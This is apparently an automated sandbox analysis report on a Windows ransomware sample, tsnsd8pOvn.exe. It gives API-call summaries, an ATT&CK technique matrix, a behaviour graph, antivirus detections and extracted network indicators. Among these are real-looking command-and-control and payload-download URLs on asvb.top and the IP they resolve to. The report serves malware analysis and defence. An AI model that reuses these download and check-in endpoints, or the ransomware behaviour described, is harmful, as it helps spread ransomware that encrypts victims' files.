        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: EnumSystemLocalesW,2_2_004387C8
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoW,2_2_0043884E
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: EnumSystemLocalesW,2_2_00437E27
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_02240AB6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0222C8B7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_0223394D
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_022349EA
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_02233F87
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_022F0AB6
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_022DC8B7
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_022E394D
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_022E49EA
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_022E3F87
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041EE80 CreateNamedPipeA,WaitForMultipleObjects,DeleteVolumeMountPointA,GetSystemPowerStatus,GetVolumeInformationA,OpenThread,GetProcessPriorityBoost,RequestWakeupLatency,CreateJobObjectA,GetPrivateProfileSectionNamesW,GlobalFix,LocalLock,WriteProfileStringA,0_2_0041EE80
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041F210 GetConsoleFontSize,DisconnectNamedPipe,GetLocalTime,GetLastError,GetCommandLineW,OpenWaitableTimerW,WritePrivateProfileStructA,ScrollConsoleScreenBufferW,GetConsoleCursorInfo,SetConsoleActiveScreenBuffer,GlobalFlags,GetBinaryTypeA,RaiseException,HeapCreate,GetOEMCP,SetCommMask,GetTapeParameters,VirtualAlloc,GetCurrentDirectoryW,SetComputerNameW,GetProcessPriorityBoost,GlobalWire,SetEnvironmentVariableA,CopyFileA,GetProfileSectionA,SetEndOfFile,ExitProcess,0_2_0041F210
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041F450 lstrlenA,GetWindowInfo,_memset,__vsnprintf,_wscanf,__wrename,_realloc,_realloc,__wctomb_s_l,GlobalAlloc,GetOverlappedResult,GetLastError,GetFileAttributesW,SearchPathW,GetProfileStringW,ExitProcess,GetModuleHandleA,GetProcAddress,WriteConsoleA,GetProcessPriorityBoost,SetFileApisToANSI,OpenSemaphoreW,SetSystemTime,GetPrivateProfileIntA,GetSystemDefaultLangID,GetUserDefaultLCID,SetVolumeLabelW,WaitForMultipleObjects,OpenMutexW,SystemTimeToTzSpecificLocalTime,GetTimeZoneInformation,MoveFileW,0_2_0041F450
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041ED40 BuildCommDCBAndTimeoutsA,SetComputerNameW,LoadLibraryW,FreeLibraryAndExitThread,GetVersionExA,VerifyVersionInfoW,OpenFile,SetHandleInformation,DeactivateActCtx,GetTapeParameters,GetTempFileNameA,GetConsoleDisplayMode,GetConsoleDisplayMode,GetDriveTypeW,RequestWakeupLatency,TlsSetValue,0_2_0041ED40
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Native API
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Deobfuscate/Decode Files or Information
        OS Credential Dumping2
        System Time Discovery
        1
        Taint Shared Content
        11
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium2
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts3
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        2
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop Protocol1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Services File Permissions Weakness
        212
        Process Injection
        2
        Software Packing
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        NTDS24
        System Information Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Services File Permissions Weakness
        1
        Masquerading
        LSA Secrets1
        Query Registry
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
        Virtualization/Sandbox Evasion
        Cached Domain Credentials141
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
        Process Injection
        DCSync11
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Services File Permissions Weakness
        Proc Filesystem2
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Network Configuration Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499386 Sample: tsnsd8pOvn.exe Startdate: 26/08/2024 Architecture: WINDOWS Score: 100 52 asvb.top 2->52 54 api.2ip.ua 2->54 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 9 other signatures 2->64 9 tsnsd8pOvn.exe 2->9         started        12 tsnsd8pOvn.exe 2->12         started        14 tsnsd8pOvn.exe 2->14         started        16 tsnsd8pOvn.exe 2->16         started        signatures3 process4 signatures5 70 Detected unpacking (changes PE section rights) 9->70 72 Detected unpacking (overwrites its own PE header) 9->72 74 Writes a notice file (html or txt) to demand a ransom 9->74 84 2 other signatures 9->84 18 tsnsd8pOvn.exe 1 17 9->18         started        76 Antivirus detection for dropped file 12->76 78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 22 tsnsd8pOvn.exe 13 12->22         started        82 Injects a PE file into a foreign processes 14->82 24 tsnsd8pOvn.exe 14->24         started        26 tsnsd8pOvn.exe 16->26         started        process6 dnsIp7 56 api.2ip.ua 188.114.97.3, 443, 49711, 49712 CLOUDFLARENETUS European Union 18->56 46 C:\Users\user\AppData\...\tsnsd8pOvn.exe, PE32 18->46 dropped 48 C:\Users\...\tsnsd8pOvn.exe:Zone.Identifier, ASCII 18->48 dropped 28 tsnsd8pOvn.exe 18->28         started        31 icacls.exe 18->31         started        file8 process9 signatures10 86 Injects a PE file into a foreign processes 28->86 33 tsnsd8pOvn.exe 1 20 28->33         started        process11 dnsIp12 50 asvb.top 92.246.89.93, 49713, 49714, 49717 LIVECOMM-ASRespublikanskayastr3k6RU Russian Federation 33->50 38 CortanaUnifiedTile...che.dat.pcqq (copy), DOS 33->38 dropped 40 C:\Users\...\CortanaUnifiedTileModelCache.dat, DOS 33->40 dropped 42 C:\_readme.txt, ASCII 33->42 dropped 44 78 other malicious files 33->44 dropped 66 Infects executable files (exe, dll, sys, html) 33->66 68 Modifies existing user documents (likely ransomware behavior) 33->68 file13 signatures14

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        tsnsd8pOvn.exe87%ReversingLabsWin32.Trojan.AZORult
        tsnsd8pOvn.exe100%AviraHEUR/AGEN.1316832
        tsnsd8pOvn.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe100%AviraHEUR/AGEN.1316832
        C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe87%ReversingLabsWin32.Trojan.AZORult
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
        https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
        http://www.reddit.com/0%URL Reputationsafe
        https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
        http://www.openssl.org/support/faq.html0%URL Reputationsafe
        https://aefd.nelreports.net/api/report?cat=wsb0%URL Reputationsafe
        https://api.2ip.ua/geo.jsonUL0%Avira URL Cloudsafe
        https://react-native-async-storage.github.io/async-storage/docs/advanced/jest0%Avira URL Cloudsafe
        http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C40%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exek0%Avira URL Cloudsafe
        http://asvb.top/nddddhsspen6/get.phpvQ.lY0%Avira URL Cloudsafe
        https://autodiscover.uk/Autodiscover/Autodiscover.xml100%Avira URL Cloudmalware
        http://asvb.top/files/penelop/5.exeXt0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/4.exe0%Avira URL Cloudsafe
        http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exederu0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exe$runndless_query_for_$0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exer0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/3.exe$0%Avira URL Cloudsafe
        http://ocsp.digicert0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin.exe$run0%Avira URL Cloudsafe
        https://autodiscover.in/Autodiscover/Autodiscover.xml100%Avira URL Cloudmalware
        http://asvb.top/files/penelop/updatewin.exerunr0%Avira URL Cloudsafe
        https://autodiscover.com/autodiscover/autodiscover.xml0%Avira URL Cloudsafe
        https://autodiscover.it/Autodiscover/Autodiscover.xml100%Avira URL Cloudmalware
        https://we.tl/t-TVrnNufMGq0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/4.exe$run0%Avira URL Cloudsafe
        http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4_70%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json7%0%Avira URL Cloudsafe
        https://api.2ip.ua/q0%Avira URL Cloudsafe
        https://autodiscover.fr/Autodiscover/Autodiscover.xml100%Avira URL Cloudmalware
        http://asvb.top/nddddhsspen6/get.php?pid=0%Avira URL Cloudsafe
        https://res.cdn.office.ne0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exeX0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/4.exerun0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin2.exe0%Avira URL Cloudsafe
        https://res.cdn.officX0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exeY0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin2.exe$run0%Avira URL Cloudsafe
        https://autodiscover.xyz/Autodiscover/Autodiscover.xml100%Avira URL Cloudmalware
        https://autodiscover.com.br/autodiscover/autodiscover.xml100%Avira URL Cloudmalware
        https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&Destination0%Avira URL Cloudsafe
        https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exe)0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json-z0%Avira URL Cloudsafe
        https://api.2ip.ua/g0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonm0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exe00%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsoni0%Avira URL Cloudsafe
        https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.co0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exe$runw0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json90%Avira URL Cloudsafe
        https://we.tl/t-TVrnNufM0%Avira URL Cloudsafe
        http://www.youtube.com/0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json70%Avira URL Cloudsafe
        http://asvb.top/files/penelop/3.exe$run0%Avira URL Cloudsafe
        https://autodiscover.online/autodiscover/autodiscover.xml0%Avira URL Cloudsafe
        https://autodiscover.com.cn/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonH0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exe$runk0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonG0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exerun0%Avira URL Cloudsafe
        https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/ui.win32.js.map/d6bb35bc608af2672a5b746ba0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin1.exe$run0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin2.exerunx0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsontem320%Avira URL Cloudsafe
        http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4O6.m0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin.exe0%Avira URL Cloudsafe
        http://www.amazon.com/0%Avira URL Cloudsafe
        https://dc.services.visualstudio.com/v2/track0%Avira URL Cloudsafe
        https://we.tl/t-TVrnNufMu0%Avira URL Cloudsafe
        http://www.twitter.com/0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/3.exe0%Avira URL Cloudsafe
        http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
        https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%Avira URL Cloudsafe
        http://asvb.top/nddddhsspen6/get.php638Z00%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin1.exe0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json2%0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsons0%Avira URL Cloudsafe
        https://github.com/react-native-async-storage/async-storage/issues0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/5.exe0%Avira URL Cloudsafe
        http://www.nytimes.com/0%Avira URL Cloudsafe
        http://cacerts.digicer0%Avira URL Cloudsafe
        https://autodiscover.sg/Autodiscover/Autodiscover.xml100%Avira URL Cloudmalware
        https://api.2ip.ua/0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin1.exerunl0%Avira URL Cloudsafe
        https://autodiscover.es/Autodiscover/Autodiscover.xml100%Avira URL Cloudmalware
        https://api.2ip.ua/geo.json0%Avira URL Cloudsafe
        http://asvb.top/nddddhsspen6/get0%Avira URL Cloudsafe
        http://asvb.top/files/penelop/updatewin2.exe.x0%Avira URL Cloudsafe
        https://api.2ip.ua/Root0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        asvb.top
        92.246.89.93
        truetrue
          unknown
          api.2ip.ua
          188.114.97.3
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://api.2ip.ua/geo.jsonfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://react-native-async-storage.github.io/async-storage/docs/advanced/jestprep_foundation_win32_bundle_V8_perf.cache.7.drfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://autodiscover.uk/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
            • Avira URL Cloud: malware
            unknown
            http://asvb.top/nddddhsspen6/get.phpvQ.lYtsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/5.exeXttsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.2ip.ua/geo.jsonULtsnsd8pOvn.exe, 0000000D.00000003.2423579315.000000000073E000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/5.exederutsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/4.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/5.exektsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=truetsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://aefd.nelreports.net/api/report?cat=bingaotakV01tmp.log.7.drfalse
            • URL Reputation: safe
            unknown
            https://deff.nelreports.net/api/report?cat=msnV0100005.log.7.dr, V01tmp.log.7.drfalse
            • URL Reputation: safe
            unknown
